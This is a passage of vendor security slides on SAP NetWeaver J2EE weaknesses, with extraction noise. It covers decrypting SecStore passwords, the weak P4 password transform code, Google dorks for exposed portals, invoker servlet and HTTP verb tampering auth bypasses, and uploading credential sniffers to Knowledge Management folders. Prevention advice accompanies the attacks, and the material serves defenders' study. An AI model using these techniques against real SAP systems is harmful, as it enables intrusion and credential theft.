$internal/version=Ni4zFF4wMSeaseforCCMxegAfx  admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS  admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh  jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH  admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ  $internal/check=BJRrz eUA+bw4XCzdz16zX78u�t  $internal/mode=encrypted  admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC  

Page 123: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

profit  

erpscan.com   123  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  We  have  an  encrypted  password  •  We  have  a  key  to  decrypt  it  •  We  got  the  J2EE_ADMIN  and  JDBC  password!  

Page 124: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Preven%on  

erpscan.com   124  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•   Install  SAP  note  1619539  •   Restrict  read  access  to  files  SecStore.proper9es  and  SecStore.key  

Page 125: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   125  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Visual  Admin  security  

Page 126: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  VisualAdmin  

erpscan.com   126  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  SAP  Visual  Admin  –  remote  tool  for  controlling  J2EE  Engine  •  Use  p4  protocol  –  SAP’s  proprietary  •  By  default  all  data  transmiMed  in  cleartext  •  P4  can  be  configured  to  use  SSL  to  prevent  MITM  •  Passwords  transmiMed  by  some  sort  of  encryp@on    •  In  reality  it  is  some  sort  of  Base64  transform  with  known  key          

Page 127: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  VisualAdmin  data  

erpscan.com   127  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 128: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Insecure  password  encryp%on  in  P4  

erpscan.com   128  ERPScan  —  Invest  In  Security  To  Secure  Investments  

         /*  87  */  char  mask  =  43690;  /*  88  */  char  check  =  21845;  /*  89  */  char[]  result  =  new  char[data.length  +  1];  /*  */    /*  91  */  for  (int  i  =  0;  i  <  data.length;  ++i)  {  /*  92  */  mask  =  (char)(mask  ^  data[i]);  /*  93  */  result[i]  =  mask;  /*  */  }  /*  95  */  result[data.length]  =  (char)(mask  ^  check);  /*  */    /*  97  */  return  result;  

Page 129: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Defense  

erpscan.com   129  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•   Use  SSL  for  securing  all  data  transmi�ng  between  server-­‐server  and  server-­‐client  connec@ons  hMp://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm  

Page 130: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   130  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  NetWeaver  HTTP  security  

Page 131: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Google  dorks  

erpscan.com   131  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  HTTP  Services  can  be  easily  found  in  internet:      •       inurl:/irj/portal    •       inurl:/IciEventService  sap  •       inurl:/IciEventService/IciEventConf  •       inurl:/wsnavigator/jsps/test.jsp  •       inurl:/irj/go/km/docs/  

Page 132: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Informa%on  disclose  

erpscan.com   132  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  Kernel  or  applica@on  release  and  SP  version.        ERPSCAN-­‐11-­‐023,ERPSCAN-­‐11-­‐027,  DSECRG-­‐00208  

 •  Applica@on  logs  and  traces        DSECRG-­‐00191,DSECRG-­‐00232  

 •  Username        ERPSCAN-­‐00231  

 •  Internal  port  scanning,  Internal  User  bruteforce        ERPSCAN-­‐11-­‐032,DSECRG-­‐00175  

 

Page 133: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Informa%on  disclose  

erpscan.com   133  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 134: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Informa%on  disclose  

erpscan.com   134  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 135: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

User  disclose  ERPSCAN-­‐00231  

erpscan.com   135  ERPScan  —  Invest  In  Security  To  Secure  Investments  

             

Page 136: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Internal  Port  scan  ERPSCAN-­‐11-­‐032  

erpscan.com   136  ERPScan  —  invest  in  security  to  secure  investments  erpscan.com   136  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Host  is  not  alive  

Port  closed  

HTTP  port  

SAP  port  

Page 137: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Preven%on  

erpscan.com   137  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•        Install  SAP  notes  1548548,1545883,1503856,948851,  1545883  •        Update  the  latest  SAP  notes  every  month  •        Disable  unnecessary  applica@ons  

Page 138: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Authen%ca%on  

erpscan.com   138  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  Declara%ve  authen%ca%on:    •  The  Web  container  (J2EE  Engine)  handles  authen@ca@on  •  Example:    J2EE  Web  applica@ons    

•  Programma%c  authen%ca%on.    •  Components  running  on  the  J2EE  Engine  authen@cate  

directly  against  the  User  Management  Engine  (UME)  using  the  UME  API.    

•  Example:  Web  Dynpro,  Portal  iViews        

Page 139: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Declara%ve  authen%ca%on  

erpscan.com   139  ERPScan  —  Invest  In  Security  To  Secure  Investments  

WEB.XML  file  is  stored  in  WEB-­‐INF  directory  of  applica@on  root.    

<security-­‐constraint>  <web-­‐resource-­‐collec@on>  <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>  <url-­‐paMern>/admin/*</url-­‐paMern>  <hMp-­‐method>DELETE</hMp-­‐method>  </web-­‐resource-­‐collec@on>      <auth-­‐constraint>            <role-­‐name>admin</role-­‐name>      </auth-­‐constraint>  </security-­‐constraint>  

Page 140: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Invoker  servlet  

erpscan.com   140  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  Func@onality  for  rapid  calling  servlets  by  their  class  name    •  Possible  to  call  any  servlet  from  applica@on  even  if  it  is  not  

declared  in    WEB.XML    •  Call  it  directly  by  using  /servlet/  directory  and  name  of  the  class  •  Like  this  /servlet/[email protected]@on  

Page 141: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Invoker  servlet  auth  bypass  

erpscan.com   141  ERPScan  —  Invest  In  Security  To  Secure  Investments  

<servlet>          <servlet-­‐name>Cri@calAc@on</servlet-­‐name>          <servlet-­‐class>[email protected]@on</servlet-­‐class>          </servlet>  <servlet-­‐mapping>              <servlet-­‐name>Cri@calAc@on</</servlet-­‐name>              <url-­‐paMern>/admin/cri@cal</url-­‐paMern>      </servlet-­‐mapping  <security-­‐constraint>  <web-­‐resource-­‐collec@on>  <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>  <url-­‐paMern>/admin/*</url-­‐paMern>  <hMp-­‐method>GET</hMp-­‐method>  </web-­‐resource-­‐collec@on>  <auth-­‐constraint>            <role-­‐name>admin</role-­‐name>      </auth-­‐constraint>  </security-­‐constraint>  

Page 142: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Preven%on  

erpscan.com   142  ERPScan  —  Invest  In  Security  To  Secure  Investments  

 •             Install  latest  updates  •             Disable  feature  by  changing  the  value  of  the  “EnableInvokerServletGlobally”  property  of  the  servlet_jsp  service  on  the  server  nodes  to  “false”.    •           To  enable  invoker  servlet  for  some  applica@ons  check  SAP  note  1445998  •           For  SAP  NetWeaver  Portal,  see  SAP  Note  1467771    

Page 143: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   143  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  24:  SAP  NetWeaver  J2EE  invoker  servlet  

unauthorized  file  read  

Page 144: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   144  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  25:  SAP  NetWeaver  J2EE  invoker  servlet  file  read  

+  secstore  decrypt  

Page 145: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Verb  Tampering  

erpscan.com   145  ERPScan  —  Invest  In  Security  To  Secure  Investments  

<security-­‐constraint>  <web-­‐resource-­‐collec@on>  <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>  <url-­‐paMern>/admin/*</url-­‐paMern>  <hMp-­‐method>GET</hMp-­‐method>  </web-­‐resource-­‐collec@on>      <auth-­‐constraint>            <role-­‐name>admin</role-­‐name>      </auth-­‐constraint>  </security-­‐constraint>  

What  if  we  will  use  HEAD  instead  of  GET  ?  

Page 146: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Verb  Tampering  example:  Auth  bypass  

•  Administra@ve    interface  for  managing  J2EE  engine  (CTC)  •  Can  be  accessed  remotely    •  Can  run  user  management  ac@ons    

•  Create  new  users  •  Assign  them  to  any  Roles  •  Execute  OS  command  on  the  server  side  •  Create  RFC  Des@na@ons  •  Read  RFC  Des@na@ons  info    

erpscan.com   146  ERPScan  —  Invest  In  Security  To  Secure  Investments  

It  means  that  adacker  get  full  access  to  SAP  and  OS  

Page 147: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   147  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  26:  SAP  NetWeaver  J2EE  verb  tampering  user  

crea9on  

Page 148: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Preven%on  

erpscan.com   148  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Preven@on:  •         Install  SAP  note  1503579,1616259  •          Scan   applica@ons   using   ERPScan  WEB.XML   check  tool  or  manually  •         Secure  WEB.XML  by  dele@ng  all    <hMp-­‐method>  •         Disable  applica@on  that  are  not  necessary  

Page 149: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   149  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  NetWeaver  Portal  Security    

Page 150: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Portal  

•  Point  of  web  access  to  SAP  systems  •  Point  of  web  access  to  other  corporate  systems  •  Way  for  aMackers  to  get  access  to  SAP  from  the  Internet  •  ~1000  Portals  in  the  world,  according  to  Shodan  •  ~200  Portals  in  the  world  according  to  Google  

 

erpscan.com   150  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 151: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Portal  issues  

•  SAP  implements  SSO  using  the  Header  Variable  Login  Module    

erpscan.com   151  ERPScan  —  Invest  In  Security  To  Secure  Investments  

creden@als  

check  

okay  cookie  

AMacker  

header_auth  

cookie  

Page 152: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Knowledge  Management  

•  One  of  Portal  modules  is  SAP  Knowledge  Management.  •  KM  is  addi@onal  func@onality  •  It  is  designed  to  aggregate  all  user  documents  and  create  a  

knowledge  base  •  Like  Sharepoint  •  An  aMacker  can:  

–  Get  read  access  to  cri@cal  documents  –  Create  phishing  pages  which  will  steal  logins  and  passwords.  

erpscan.com   152  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 153: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

KM  Documents  

•  KM  by  default  can  be  found  here  /irj/go/km/naviga@on  •  Some@mes  Guest  user  can  have  access  to  KM  •  You  can  test  listed  folders:  

–  /irj/go/km/naviga@on/userhome/  –  /irj/go/km/naviga@on/docs/  –  /irj/go/km/naviga@on/documents/Public  Documents/  –  /irj/go/km/naviga@on/Entry  Points/Public  Documents/  

erpscan.com   153  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 154: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

KM  Documents  

•  Some@mes  it  is  possible  to  put  documents  into  shared  folders  •  Like  this  folder  /irj/go/km/docs/documents/Public  Documents/  •  You  can  upload  HTML  file  with  login  sniffer  or  cookie  sniffer  

erpscan.com   154  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 155: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  

155  erpscan.com   ERPScan  —  Invest  In  Security  To  Secure  Investments  

Ques@ons?  

Page 156: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Conclusion  

We   devote   agen9on   to   the   requirements   of   our  customers   and   prospects,   and   constantly   improve   our  product.   If   you   presume   that   our   scanner   lacks   a  par9cular  func9on,  you  can  e-­‐mail  us  or  give  us  a  call.  We  will   be   glad   to   consider   your   sugges9ons   for   the   next  releases  or  monthly  updates.  

156  erpscan.com   ERPScan  —  Invest  In  Security  To  Secure  Investments  

web:  www.erpscan.com      www.dsecrg.com    e-­‐mail:  [email protected],  [email protected]